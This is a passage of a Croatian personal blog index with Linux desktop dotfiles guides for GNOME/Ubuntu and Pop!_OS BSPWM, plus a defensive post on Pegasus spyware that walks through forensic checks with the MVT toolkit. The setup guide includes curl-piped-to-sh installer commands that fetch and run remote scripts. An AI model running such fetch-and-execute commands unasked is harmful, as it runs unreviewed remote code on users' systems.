https://github.com/karlstav/cava.git Zatim moramo kompajlirati Cavu:\ncd cava ./autogen.sh ./configure make Sada možemo instalirati Cavu:\nsudo make install Instalacija Ttyper-a: sudo apt install cargo sudo apt install ttyper Instalacija GRUB teme # Kloniranje repozitorija: cd ~/Downloads git clone https://github.com/semimqmo/sekiro_grub_theme Instalacija GRUB teme: sudo ./install.sh Instalacija raznih tema # Tema GTK-a: Nordic Tema ikone: Flatery_Dark Tema kursora: Oreo_Blue NAPOMENA: Za instaliranje ovih tema trebate stvoriti dvije skrivene mape u početnom direktoriju. cd ~/ mkdir .themes mkdir .icons U mapu .themes trebamo ubaciti GTK temu i temu ikona, a u .icons temu kursora. Zatim ih moramo omogućiti iz aplikacije Gnome Tweak Tools.\nStvorite ili preuzmite postojeću početnu stranicu i dodajte je u Firefox.\nPromijenite pozadinu pomoću aplikacije Gnome Tweak Tools.\nWikipedia # Sada kada smo napravili ovu GNOME konfiguraciju, vrijeme je da razjasnimo što svaka aplikacija radi.\n🧠 [Pop Shell]\nPop Shell nam daje mogućnost korištenja Tilling Window Managera na Desktop sustavu, koji raspoređuje prozore na ekranu pomoću skripte i tako štedi prostor na ekranu.\n⌨️ [Neofetch]\nNeofetch je naredba koja nam daje specifikacije sustava, plus ima cool izgled.\n🍫 [Zathura]\nZathura je PDF čitač u kojem je moguće promijeniti izgled i mnoge druge opcije pomoću jedne konfiguracijske datoteke.\n🐚 [Ranger]\nRanger nam služi kao upravitelj datoteka u terminalu.\n📋 [Vim] uređivač teksta\nKako mnogi ljudi koriste notepad na Windows operativnim sustavima, mi koristimo nano i Vim.\nNano uređivač teksta puno je lakši za korištenje, dok je Vim više namijenjen programerima zbog svojih prečaca.\n🌳 [cbonsai]\nCbonsai je skripta koja u našem terminalu čini stablo od znakova, slova i brojeva.\n🎮 [tty-tetris]\nTty-Tetris je aplikacija koja nam omogućuje igranje Tetrisa na terminalu.\n📰 [ttyper]\nTtyper je aplikacija koja mjeri brzinu tipkanja na terminalu.\n🕶️ [Nordic] Tema GTK-a.\nNordic Dark je GTK tema (tema za aplikacije korisničkog sučelja) koja nam daje mračni izgled na aplikacije s korisničkim sučeljem.\n🔷 [Flattery] tema ikona.\nSam naziv kaže, aplikacije koje imaju korisničko sučelje uglavnom imaju ikone na koje možemo kliknuti mišem; ova tema nam daje drugačiji izgleda ikona.\n🔵 [Oreo Blue] tema kursora.\nOva tema daje izgled plavog kursora; umetnuta je samo zbog izgleda i odgovara svim ostalim bojama ovog operativnog sustava.\n🔥🦊 [Firefox] preglednik.\nKoristim Firefox jer je to jedan od najboljih web preglednika orijentiranih na privatnost, po mom mišljenju.\n⏰ tty-clock\nTty-clock je aplikacija koja ima za cilj prikazati vrijeme i datum na terminalu.\n🎚️ CAVA audio vizualizator.\nCava je aplikacija koja služi kao audio vizualizator.\n📈 HTop\nAplikacija HTop pokazuje koji procesori trenutno rade i koliko RAM-a zauzimaju te mnoge druge stvari. Zamislite HTop kao upravitelj zadataka u sustavu Windows.\n😎 CMatrix\nCMatrix je aplikacija koja je ovdje samo radi izgleda, a svrha joj je ispisati neki tekst u otvorenom terminalu koji ima za cilj dati prikaz hakiranja iz filma Matrix.\n🤠 Ranger\nRanger je aplikacija koja nam omogućuje pregled i pristup svim datotekama na računalu u terminalu.\n🍭 Lollypop\nLollypop je glazbena aplikacija.\nHvala vam na vašem vremenu 💙 # ","date":"19 listopada 2021","permalink":"/hr/blog/gnome-ubuntu-nordic/","section":"Blogs","summary":"💻 GNOME ide NORD konfiguracijske datoteke 💻 Ovo su moje trenutne dot datoteke Ubuntu Linuxa.\nInstalacija će vam pomoći da stvorite isti izgled kao na slikama; ovdje su upute korak po korak.","title":"[GNOME] Ubuntu Nodric"},{"content":"","date":"21 srpnja 2021","permalink":"/hr/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity"},{"content":" 🔍 NSO Pegasus Spyware 🔍 Što je Pegasus Spyware? # Tijekom vikenda procurile su vijesti da je nekoliko autoritarnih vlada (uključujući Meksiko, Maroko i UAE) koristilo softver za špijuniranje koji je razvila izraelska tvrtka NSO Group . Cilj im je bio špijunirati političare, aktiviste i novinare. Popis od 50.000 telefonskih brojeva koji se potencijalno koriste za špijunažu došao je u posjed pariške neprofitne organizacije Zabranjene priče i Amnesty International , koje su podijelili s javnošću The Washington Post i The Guardian .\nNakon što su istraživači cyber sigurnosti analizirali nekoliko telefona žrtava ovog napada, otkrili su da se radi o složenom malwareu, koji može pristupiti svim podacima na telefonu, od poruka, telefonskih poziva do vaših fotografija, a što je najgore, Pegasus vam omogućuje da snimati razgovore i pristupiti mikrofonu i kameri. To znači da vas ovaj špijunski softver može pratiti 24/7 i bilježiti sve što kažete, učinite i gdje se nalazite.\nTakođer, ovaj špijunski softver napravljen je i za iOS i za Android operativne sustave.\nKako Pegasus radi? # Pegasus radi pomoću tzv. \u0026ldquo;0-day exploits\u0026rdquo;. Riječ je o sistemskim greškama za koje gotovo nitko ne zna, čak ni tvrtke koje stoje iza operativnih sustava, elektronike itd. Jednostavnije objašnjenje je da Apple ne zna da te greške postoje u kodu, zbog čega postoje \u0026ldquo;bug bounty\u0026rdquo; \u0026quot; programe za koje se prijavljuju istraživači kibernetičke sigurnosti. Traže greške u sustavu i dobivaju novčanu nagradu ovisno o utjecaju te greške. Naravno, pretpostavimo da istraživači cyber sigurnosti ne uspiju otkriti pogreške koda (bugove) prije hakera s lošim namjerama. U tom slučaju to predstavlja problem i pridonosi razvoju raznog zlonamjernog softvera kao što je Pegasus. Koliko nam je poznato, dovoljno je primiti samo jedan poziv ili tekstualnu poruku (na koju ne morate kliknuti niti odgovoriti) da se vaš iOS ili Android uređaj zarazi.\nKako izbrisati ovaj špijunski softver sa svog mobilnog uređaja? # Ne postoji način da uklonite Pegasus sa svog mobilnog uređaja, ali najbolji savjet je da stalno ažurirate mobilni operativni sustav na najnoviju verziju. Posljednja poznata verzija iOS-a koja je ranjiva na ovu metodu hakiranja je iOS 14.6.\nKako otkriti Pegasus? # Pegasus je teško otkriti nakon što ga instalirate na mobilni uređaj, a dizajniran je tako da se sam izbriše u slučaju da dobije krivi broj telefona ili prepozna da uređaj nije bio aktivan dulje od 60 dana. Trenutačno postoji nekoliko IOC-ova (indikatora kompromisa) koji su pronađeni, a možete ih pronaći na AmnestyTech Github .\nKako napraviti digitalnu forenziku na svom uređaju? # Sada ću vam pokazati kako napraviti digitalnu forenziku na vašem uređaju, pomoću koje možete provjeriti jeste li zaraženi ovim špijunskim softverom.\nPotrebno:\nOperacijski sustav: Kali Linux Program: MVT (Mobile Verification Toolkit) IOCs: AmnestyTech IOCs Upute # Nakon instaliranja ili dizanja operativnog sustava Kali Linux u virtualnu mašinu, prvo što trebamo napraviti je ažuriranje sustava.\nKoristim Kali Linux u ovom primjeru, ali svaka distribucija temeljena na Debian Linuxu trebala bi raditi s malim razlikama u naredbama.\nAžuriranje Kali Linux-a # Otvaramo terminal i upisujemo sljedeće naredbe:\nsudo apt update sudo apt upgrade Instalacija MVT # Prvo moramo instalirati nekoliko potrebnih paketa kako bi MVT ispravno radio.\nInstalacija potrebnih paketa: sudo apt install python3 python3-pip libusb-1.0-0 git Instalacija MVT:\nNakon instaliranja ovisnosti, instaliramo MVT. Prvo ulazimo u direktorij preuzimanja.\ncd Downloads Zatim moramo preuzeti MVT s GitHuba: git clone https://github.com/mvt-project/mvt.git Sada ulazimo u MVT direktorij koji smo preuzeli: cd mvt Sada instaliramo MVT pomoću ove naredbe: pip3 install . Dodavanje varijable PATH: export PATH=$PATH:/home/*USERNAME*/.local/bin Napomena: Korisničko ime morate promijeniti ovisno o korisničkom imenu na Linuxu. Preuzimanje IOC-a # Prvo ćemo promijeniti direktorij u Downloads: cd ~/Downloads Zatim kloniramo repozitorij: git clone https://github.com/AmnestyTech/investigations.git Digitalna forenzika na iOS uređajima # Ako imate iOS (Apple) uređaj, slijedite upute u nastavku; ako ne, možete pronaći upute za Android sustave pod Digitalna forenzika na Android uređajima.\nKopija sustava vašeg uređaja # Prvi korak u ovom procesu je sigurnosna kopija datoteke operativnog sustava na mobilnom telefonu kako bismo je mogli analizirati. Postoje dvije metode Filesystem dump i iTunes Backup.\nFilesystem dump je metoda koja zahtijeva jailbreak iOS sustava koji možete učiniti koristeći checkra1n . Prednosti ove metode su u tome što možete \u0026ldquo;izbaciti\u0026rdquo; cijeli sustav i koristiti ga za izdvajanje više podataka, ali nažalost, jailbreaking iPhone gubi jamstvo, a neki iPhone uređaji na određenim verzijama iOS-a ne mogu se jailbreakovati.\niTunes sigurnosna kopija je alternativna opcija, iako će ponovno izvući manje podataka, zadržavajući jamstvo vašeg uređaja.\nNAPOMENA: Možete ekstraktovati više podataka pomoću iTunes sigurnosne kopije ako koristite šifriranu sigurnosnu kopiju. Sigurnosno kopiranje iOS-a pomoću iTunes-a # Možete sigurnosno kopirati iTunes na Windows uređaju. Upute:\nInstalirajte iTunes na svoje računalo ili prijenosno računalo. Spojite iPhone pomoću kabela na računalo ili prijenosno računalo. Otvorite svoj iPhone u aplikaciji iTunes. Ako želite bolje rezultate, odaberite opciju kriptirane sigurnosne kopije. Pokrenite sigurnosnu kopiju; može trajati do 30 minuta. Nakon što je sigurnosna kopija dovršena, možete pronaći njezinu lokaciju u operativnim sustavima Windows 10 u jednoj od dvije mape:\n%USERPROFILE%\\Apple\\MobileSync\\ %USERPROFILE%\\AppData\\Roaming\\Apple Computer\\MobileSync\\ Najlakši način da ih pronađete je da zalijepite %USERPROFILE% u traku \u0026ldquo;Traži\u0026rdquo; i ručno provjerite mapu. Važna mapa je mapa s UDID (mapa pod nazivom 0000 [REDIGIRANO]).\nDešifriranje sigurnosne kopije: # Ako ste šifrirali svoju sigurnosnu kopiju, prenesite je na računalo ili virtualnu mašinu s Linuxom (u ovom primjeru, premjestit ću datoteku s USB-a u mapu Dokumenti); tada moramo stvoriti mapu za dešifriranje:\nmkdir ~/Documents/decrypted Sada dešifriramo datoteku:\nmvt-ios decrypt-backup -p \u0026#39;YOUR_PASSWORD\u0026#39; -d ~/Documents/decrypted ~/Documents/0000[REDACTED] Ova naredba će trajati dugo, ovisno o težini kopije. Nakon što je dešifriranje završeno, vrijeme je da napravite izlaznu mapu:\nmkdir ~/Downloads/output_forensics Nakon toga ostaje nam samo jedna naredba koja će pomoću strix2 datoteke izvršiti skeniranje i provjeriti je li iPhone zaražen Pegasusom ili ne.\nmvt-ios check-backup -i ~/Downloads/investigations/2021-07-18_nso/pegasus.strix2 -o ~/Downloads/output_forensics ~/Documents/decrypted Digitalna forenzika na Android uređajima # Digitalna forenzika na Android uređajima puno je kompliciranija; MVT trenutno nudi dvije metode.\nPreuzimanjem i analizom APK datoteka koje su instalirane. Izdvajanjem Android sigurnosnih kopija i provjerom sumnjivih SMS poruka. Provjera APK datoteke # Da biste koristili MVT opciju mvt-android, vaš Android uređaj mora biti povezan s Linuxom. Morat ćete uključiti USB debugging opciju na vašem telefonu.\nZatim ćete pri prvom povezivanju morati potvrditi povezivanje uređaja na Androidu, tako da na Linuxu možemo stvoriti izlaznu mapu:\nmkdir ~/Downloads/output_forensics Zatim možete pokrenuti sljedeću naredbu:\nmvt-android download-apks -o ~/Downloads/output_forensics Možete odabrati gdje želite vidjeti SHA256 Hash APK-ove ekstraktuje na VirusTotal . To može pomoći u prepoznavanju zlonamjernih APK datoteka (aplikacija) na vašem Android uređaju. To radimo naredbom:\nmvt-android download-apks -o ~/Downloads/output_forensics --virustotal Provjera zlonamjernih SMS poruka # Ova metoda koristi MVT za provjeru je li vaš Android uređaj zaražen zlonamjernim SMS-om. Pretpostavljam da ste već povezali svoj uređaj kao u uputama za APK datoteke; sada pokrećemo ovu naredbu:\nadb backup com.android.providers.telephony Moramo odobriti sigurnosnu kopiju na vašem telefonu i potencijalno unijeti vašu sigurnosnu lozinku. Sigurnosna kopija će tada biti pohranjena u mapu pod nazivom backup.ab.\nZatim trebamo koristiti Android Backup Extractor kako bismo prethodno dobivenu datoteku pretvorili u čitljiv format. Java mora biti instalirana na sustav!\nZatim pokrenite sljedeće naredbe:\njava -jar ~/Downloads/abe.jar unpack backup.ab backup.tar tar xvf backup.tar Android Backup Extractor će vas pitati za lozinku ako je sigurnosna kopija šifrirana.\nZatim MVT provjerava postoje li zlonamjerne veze u SMS porukama; to radimo naredbom:\nmvt-android check-backup -o sms . Pomoću opcija \u0026ndash;iocs ili \u0026ndash;i možemo odrediti IOCs datoteku.\nKoje datoteke mvt-ios stvara i zatim provjerava? # Nakon što MVT izvrši analizu, terminal će vam napisati upozorenje (sumnjiva datoteka) ako je vaš uređaj zaražen Pegasusom. Sada ćete vidjeti sve datoteke koje je MVT stvorio i provjerio tijekom analize.\n💵 [cache_files.json]\nOva JSON datoteka stvara modul CacheFiles. Modul izvlači zapise iz svih datoteka SQLite baze podataka spremljenih na disk pod nazivom Cache.db. Ove baze podataka obično sadrže podatke iz internog predmemoriranja URL-a iOS-a.\nOvaj modul možete koristiti za pregled HTTP zahtjeva i odgovora. Ovo je korisno jer možemo vidjeti HTTP zahtjeve koji su dio \u0026ldquo;lanca iskorištavanja\u0026rdquo;, a rade tako da iOS servis pokušava preuzeti zlonamjernu datoteku tijekom prve faze ovog zahtjeva.\n📱 [calls.json]\nOva JSON datoteka stvara modul Pozivi. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/Library/CallHistoryDB/CallHistory.store data sadrži popis svih dolaznih i odlaznih poziva, uključujući aplikacije kao što su WhatsApp ili Skype.\n💻 [chrome_favicon.json]\nOva JSON datoteka stvara modul ChromeFavicon. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/Favicons, i služi za spremanje favikona (male ikone u vašem kartice web preglednika) za brže učitavanje.\nFavicons se mogu hakirati; više o ovoj temi možete vidjeti na LINK .\n💻 [chrome_history.json]\nOva JSON datoteka stvara modul ChromeHistory. Modul izdvaja zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/History, koja sadrži vašu povijest Google Chrome web preglednika.\n🤓 [contacts.json]\nOva JSON datoteka stvara modul Kontakti. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb, koja sadrži popis vaših kontakata.\n🦊 [firefox_favicon.json]\nModul FirefoxFavicon stvorio je ovu JSON datoteku. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/profile.profile/browser.db, te služi za spremanje favikona (malih ikona u karticama vašeg web preglednika) za brže učitavanje.\n🦊 [firefox_history.json]\nModul FirefoxHistory stvorio je ovu JSON datoteku. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/profile.profile/browser.db koja sadrži vašu povijest preglednika Firefox.\n📋 [id_status_cache.json]\nOva JSON datoteka stvara modul IDStatusCache. Modul izvlači zapise iz plist datoteke koja se nalazi na /private/var/mobile/Library/Preferences/com.apple.identityservices.idstatuscache.plist koja sprema uzorke vašeg Apple ID-a (ovo uključuje biometrijske podatke kao što su Touch i Face ID).\n🤝 [interaction_c.json]\nOva JSON datoteka stvara modul InteractionC. Modul izvlači zapise iz SQLite baze podataka koja se nalazi na /private/var/mobile/Library/CoreDuet/People/interactionC.db, i sadrži detalje o interakcijama korisnika s instaliranim aplikacijama.\n📍 [locationd_clients.json]\nOva JSON datoteka stvara modul LocationdClients. Modul izvlači zapise iz plist datoteke koja se nalazi na /private/var/mobile/Library/Caches/locationd/clients.plist i sadrži predmemoriranu memoriju aplikacija koje su tražile pristup uslugama lokacije.\n🔷 [manifest.json]\nModul Manifest stvorio je ovu JSON datoteku. Modul izvlači zapise iz SQLite Manifest.db baze podataka koju je stvorio iTunes tijekom izrade sigurnosne kopije i služi lokalnom sigurnosnom kopiranju gdje se nalaze sve datoteke na iOS uređaju.\n💽 [datausage.json]\nOva JSON datoteka stvara modul Datausage. Modul izvlači zapise iz SQLite baze podataka koja se nalazi u /private/var/wireless/Library/Databases/DataUsage.sqlite. Sadrži povijest korištenja podataka od strane procesa koji se koriste u sustavu.\n💻 [safari_browser_state.json]\nOva JSON datoteka stvara modul SafariBrowserState. Modul izvlači zapise iz SQLite baza podataka koje se nalaze na /private/var/mobile/Library/Safari/BrowserState.db ili /private/var/mobile/Containers/Data/Application/*/Library/Safari/BrowserState.db , i sadrže popis otvorenih kartica u web pregledniku Safari.\n💻 [safari_favicon.json]\nOva JSON datoteka stvara modul SafariFavicon. Modul izvlači zapise iz SQLite baza podataka koje se nalaze na /private/var/mobile/Library/Image Cache/Favicons/Favicons.db ili /private/var/mobile/Containers/Data/Application/*/Library/Image Cache/ Favicons/Favicons.db, a služi za spremanje favikona (malih ikona u karticama vašeg web preglednika) radi bržeg učitavanja.\n🔥 [safari_history.json]\nOva JSON datoteka stvara modul SafariHistory. Modul izvlači zapise iz SQLite baza podataka koje se nalaze na /private/var/mobile/Library/Safari/History.db ili /private/var/mobile/Containers/Data/Application/*/Library/Safari/History.db, koji sadrže povijest pretraživanja.\n📝 [sms.json]\nOva JSON datoteka stvara SMS modul. Modul izvlači popis SMS poruka koje sadrže HTTP veze iz SQLite baze podataka koja se nalazi na /private/var/mobile/Library/SMS/sms.db.\n📝 [sms_attachments.json]\nOva JSON datoteka stvara modul SMSAttachments. Modul izvlači pojedinosti o privicima poslanim putem SMS-a ili iMessage-a iz iste baze podataka koju koristi SMS modul.\n📜 [version_history.json]\nOva JSON datoteka stvara modul IOSVersionHistory. Modul izvlači zapise ažuriranja iOS-a iz datoteka popisa analitike koje se nalaze na /private/var/db/analyticsd/Analytics-Journal-*.Ips.\n🕸️ [webkit_indexeddb.json]\nOva JSON datoteka stvara modul WebkitIndexedDB. Modul izvlači popis datoteka i mapa koje se nalaze u /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/IndexedDB i sadrži IndexedDB datoteke koje je izradila bilo koja aplikacija.\n🕸️ [webkit_local_storage.json]\nOva JSON datoteka stvara modul WebkitLocalStorage. Modul izvlači popis naziva datoteka i mapa koji se nalaze u /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/LocalStorage/ i sadrži datoteke iz interne pohrane koju je stvorila bilo koja aplikacija.\n🕸️ [webkit_safari_view_service.json]\nOva JSON datoteka stvara modul WebkitSafariViewService. Modul izvlači popis naziva datoteka i mapa koji se nalaze u /private/var/mobile/Containers/Data/Application/*/SystemData/com.apple.SafariViewService/Library/WebKit/WebsiteData/, i sadrži datoteke koje je predmemorirao SafariVewService .\n🕸️ [webkit_session_resource_log.json]\nOva JSON datoteka stvara modul WebkitSessionResourceLog. Modul izvlači zapise iz plist datoteka pod nazivom full_browsing_session_resourceLog.plist i sadrži zapise o resursima učitane s raznih posjećenih web stranica.\n📞 [whatsapp.json]\nOvu JSON datoteku izradio je modul WhatsApp. Modul izvlači popis WhatsApp poruka koje sadrže HTTP veze iz SQLite baze podataka koja se nalazi na /private/var/mobile/Containers/Shared/AppGroup/*/ChatStorage.sqlite.\nZaključak # Pegasus je jedan od najopasnijih alata za špijunažu, ne slažem se s postupanjem tvrtke NSO Group i smatram da svatko ima pravo na privatnost. Trenutno bi jedina zaštita od Pegasusa mogao biti telefon koji nije ni Android ni iOS. Dobra alternativa je Nokia 8110 4G s operativnim sustavom GerdaOS . Preporučujem da pogledate Guardianov intervju s Edwardom Snowdenom na temu Pegasus.\nHvala na vašem vremenu 💙 # ","date":"21 srpnja 2021","permalink":"/hr/blog/nso-pegasus-spyware/","section":"Blogs","summary":"🔍 NSO Pegasus Spyware 🔍 Što je Pegasus Spyware? # Tijekom vikenda procurile su vijesti da je nekoliko autoritarnih vlada (uključujući Meksiko, Maroko i UAE) koristilo softver za špijuniranje koji je razvila izraelska tvrtka NSO Group .","title":"NSO Pegasus Spyware"},{"content":"","date":"21 srpnja 2021","permalink":"/hr/categories/privacy/","section":"Categories","summary":"","title":"Privacy"},{"content":" 🖥️ Pop! Linux konfiguracijske datoteke 🖥️ Ovo su moje trenutne dot datoteke Pop! Linux distribuciju.\nInstalacija će vam pomoći da stvorite isti izgled kao na slikama; ovdje su upute korak po korak.\nSpecifikacije sustava:\nOS: Pop!_OS WM: BSPWM Daemon tastature: Sxhkd Bar: Polybar Kompozitor: Picom Pokretač aplikacija: Rofi Terminal: Alacritty Shell: Oh-my-ZSH Shell tema: Powerlevel10k Uređivač teksta: Vim-Airline Zaključani zaslon: Slim and Slimlock Notifikacije: Dunst GTK tema: Nordic_Dark Icon tema: Flatery_Dark Cursor tema: Oreo_Blue Font: Source_Code_Pro Preglednik: Firefox Tema preglednika: Minimal_Functional_Fox Instalacija # Za početak izrade ovog izgleda, pretpostavljam da imate svježe instaliran Pop! OS.\nAko vas zanima što aplikacija radi, Wikipedia će vam pomoći.\nNadogradnja repozitorija i nadogradnja sustava # sudo apt update sudo apt upgrade Instalacija BSPWM Tiling Window Manager # Prvo moramo instalirati nekoliko potrebnih paketa koji su nam potrebni za nastavak instalacije.\nInstalacija potrebnih paketa: sudo apt install build-essential git vim xcb libxcb-util0-dev libxcb-ewmh-dev libxcb-randr0-dev libxcb-icccm4-dev libxcb-keysyms1-dev libxcb-xinerama0-dev libasound2-dev libxcb-xtest0-dev libxcb-shape0-dev Kloniranje repozitorija: cd ~/Downloads git clone https://github.com/baskerville/bspwm.git Kompajliranje i instaliranje BSPWM-a: cd bspwm make sudo make install Kopirajte BSPWM konfiguracijske datoteke: mkdir ~/.config/bspwm cp examples/bspwmrc ~/.config/bspwm chmod +x ~/.config/bspwm/bspwmrc cd .. Instalacija daemon-a tipkovnice # Na primjer, moramo koristiti takozvani daemon tipkovnice za korištenje tipkovničkih prečaca za otvaranje terminala, drugih aplikacije itd. To je proces koji se izvodi u pozadini i daje upute BSPWM Tilling Window Manageru što učiniti ako netko pritisne određeni prečac na tipkovnici.\nAko vas zanima što prečac radi prema mojim postavkama, dio prečaca će vam pomoći.\nKloniranje repozitorija: cd ~/Downloads git clone https://github.com/baskerville/sxhkd.git Kompajliranje i instaliranje sxhkd-a: cd sxhkd make sudo make install Kopirajte sxhkd konfiguracijske datoteke: mkdir ~/.config/sxhkd cp ../bspwm/examples/sxhkdrc ~/.config/sxhkd cd .. NAPOMENA: Ako mijenjate bilo što u datoteci sxhkdrc, obratite pozornost na koji terminal ste postavljeni; ako koristite obični Pop OS! terminal, trebate promijeniti OS u gnome-terminal pod emulatorom terminala. Instalacija Polybar-a # Instalacija potrebnih paketa: sudo apt install cmake cmake-data pkg-config python3-sphinx libcairo2-dev libxcb1-dev libxcb-util0-dev libxcb-randr0-dev libxcb-composite0-dev python3-xcbgen xcb-proto libxcb-image0-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-xkb-dev libxcb-xrm-dev libxcb-cursor-dev libasound2-dev libpulse-dev libjsoncpp-dev libmpdclient-dev libcurl4-openssl-dev libnl-genl-3-dev Kloniranje repozitorija: cd ~/Downloads git clone --recursive https://github.com/polybar/polybar Kompajliranje i instalacija Polybar-a: cd polybar mkdir build cd build cmake .. make -j$(nproc) sudo make install Instalacija Picom-a # Instalacija potrebnih paketa: sudo apt install meson libxext-dev libxcb1-dev libxcb-damage0-dev libxcb-xfixes0-dev libxcb-shape0-dev libxcb-render-util0-dev libxcb-render0-dev libxcb-randr0-dev libxcb-composite0-dev libxcb-image0-dev libxcb-present-dev libxcb-xinerama0-dev libpixman-1-dev libdbus-1-dev libconfig-dev libgl1-mesa-dev libpcre2-dev libevdev-dev uthash-dev libev-dev libx11-xcb-dev Kloniranje repozitorija: cd ~/Downloads git clone https://github.com/ibhagwan/picom.git Izrada Picom-a s Ninja-om: cd picom git submodule update --init --recursive meson --buildtype=release . build ninja -C build Instalacija Picom kompozitora: sudo ninja -C build install cd .. Instalacija Rofi-a # sudo apt install rofi Instalacija Alacritty terminala # sudo apt install alacritty Kloniranje repozitorije: cd ~/Downloads git clone https://github.com/lukapiplica/dots.git Postavljanje Alacritty teme: mkdir ~/.config/alacritty cp dots/alacritty/alacritty.yml ~/.config/alacritty/ NAPOMENA: Ako dobijete pogrešku: GLSL 3.30 not supported, učinite ovo: nano /usr/share/applications/com.alacritty.Alacritty.desktop Promijenite Exec=alacritty u Exec=bash -c \u0026quot;LIBGL_ALWAYS_SOFTWARE=1 alacritty\u0026quot;.\nNAPOMENA: Nakon ovog koraka, spremni ste za prijavu na BSPWM; prvo se morate odjaviti s trenutnog sučelja radne površine; zatim kliknite na ikonu ⚙️ u donjem desnom kutu i odaberite BSPWM. Instalacija fontova # cd ~/Downloads cd dots sudo cp -r Source_Code_Pro /usr/share/fonts fc-cache -v Postavljanje pozadinske slike # Instalacija Feh-a sudo apt install feh Premještanje pozadinskih slika : mkdir ~/Wall cp -r ~/Downloads/dots/Wallpapers/ ~/Wall Postavljanje pozadinske slike: echo \u0026#39;feh --bg-fill $HOME/Downloads/dots/Wallpapers/wallpaper2.jpeg\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc Konfiguracija Polybar-a # mkdir ~/.config/polybar cd ~/Downloads/dots/polybar cp * -r ~/.config/polybar echo \u0026#39;~/.config/polybar/./launch.sh\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc cd fonts sudo cp * /usr/share/fonts/truetype/ Instalacija Oh-My-ZSH-a # sudo apt install zsh sh -c \u0026#34;$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh) Instalacija Powerlevel10k-a # Kloniranje repozitorija: git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k Nakon kloniranja, moramo postaviti ovu temu u datoteku ~/.zshrc; to radimo upisivanjem u datoteku .zshrc ovom naredbom ZSH_THEME=\u0026quot;powerlevel10k/powerlevel10k\u0026quot;\nUpisujemo u terminal:\np10k configure Slijedimo upute na terminalu da napravimo temu koju želimo.\nInstalacija Vim teme # mkdir -p ~/.vim/colors cd ~/Downloads cp dots/nord.vim ~/.vim/colors Kloniranje Vim Airline repozitorije: cd ~/Downloads git clone https://github.com/vim-airline/vim-airline.git cd vim-airline cp * -r ~/.vim echo \u0026#39;colorscheme nord\u0026#39; \u0026gt;\u0026gt; ~/.vimrc echo \u0026#39;let g:airline_theme=\u0026#39;base16\u0026#39;\u0026#39; \u0026gt;\u0026gt; ~/.vimrc Postavljanje rofi teme # mkdir -p ~/.config/rofi/themes cp ~/Downloads/dots/nord.rasi ~/.config/rofi/themes rofi-theme-selector Rofi Theme Selector pokazat će nam neke od tema. Za odabir naše teme idite na Nord theme kliknite Enter, a zatim da biste je postavili zauvijek, pritisnite Alt + a nano ~/.config/sxhkd/sxhkdrc Otvara uređivač nano teksta u terminalu i moramo promijeniti dmenu u rofi -show drun Instalacija Slim-a i Slimlock-a # sudo apt instll slim libpam0g-dev libxrandr-dev libfreetype6-dev libimlib2-dev libxft-dev sudo dpkg-reconfigure gdm3 Napomena: Ako dobijemo izbornik, moramo odabrati Slim kao opciju. Za postavljanje teme: cd ~/Downloads/dots sudo cp slim.conf /etc \u0026amp;\u0026amp; sudo cp slimlock.conf /etc sudo cp default /usr/share/slim/themes Razni programi # Uspješno smo postigli izgled ovog operativnog sustava; sada instaliramo nekoliko programa sa slika.\nInstalacija tty-clock-a # sudo apt-get install tty-clock Instalacija CAVA Audio Visualizer # sudo add-apt-repository ppa:hsheth2/ppa sudo apt-get update sudo apt-get install cava Instalacija htop-a # sudo apt-get install htop Instalacija cmatrix-a # sudo apt-get install cmatrix Instalacija sxiv-a # sudo apt-get install sxiv Instalacija Ranger-a # sudo apt-get install ranger Instalacija pfetch-a # cd ~/Downloads git clone https://github.com/dylanaraps/pfetch.git sudo install pfetch/pfetch /usr/local/bin/ ls -l /usr/local/bin/pfetch Instalacija chafa-e # cd ~/Downloads git clone https://github.com/hpjansson/chafa.git cd chafa ./autogen.sh make sudo make install Instalacija igre zmije # sudo apt install python3-pip python3 -m pip install -U pygame --user cd ~/Downloads git clone https://github.com/Unixado/Snake.git cd Snake python src/game.py Instalacija of lollypop # sudo add-apt-repository ppa:gnumdk/lollypop sudo apt install lollypop Instalacija Minimal Functional Fox-a # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/mut-ex/minimal-functional-fox/master/install.sh)\u0026#34; Postavite temu za Firefox cp -r ~/Downloads/dots/.firefoxthemes ~/ Zatim otvorimo Firefox i idemo na preferences, zatim na Home i tamo gdje piše Homepage and new windows izaberemo Custom URLs ..., ispod pišemo ovo: file:///home/*YOUR USERNAME*/.firefoxthemes/startpage/Startpage/index.html Restartovati Firefox Instalacija GTK teme # Instalacija Lxappearance-a # sudo apt-get install lxappearance Instalacija Nordic Dark teme # Link: https://www.gnome-look.org/p/1267246/ Preuzmite zip datoteku, izdvojite je i umetnite u Lxappearance.\nInstalacija Flattery Dark teme za ikone # Link: https://www.gnome-look.org/s/Gnome/p/1332404 Preuzmite zip datoteku, izdvojite je i umetnite u Lxappearance.\nInstalacija Oreo Blue kursor teme # Link: https://www.gnome-look.org/s/Gnome/p/1360254/ Preuzmite zip datoteku, izdvojite je i umetnite u Lxappearance.\nWikipedia # Nakon što smo napravili ovu BSPWM konfiguraciju, vrijeme je da razjasnimo što svaka aplikacija radi. Unutar direktorija ~/.config/ možete pronaći sve datoteke koje su vam potrebne za pokretanje BSPWM-a.\n🧠 [BSPWM]\nBSPWM je alat za upravljanje prozorima koji se, za razliku od drugih sučelja radne površine, svaki novi prozor otvara prema algoritmu.\nAko imamo npr. dva prozora, oni će biti otvoreni na cijelom ekranu i ne mogu se nalaziti jedan preko drugog, kao što je 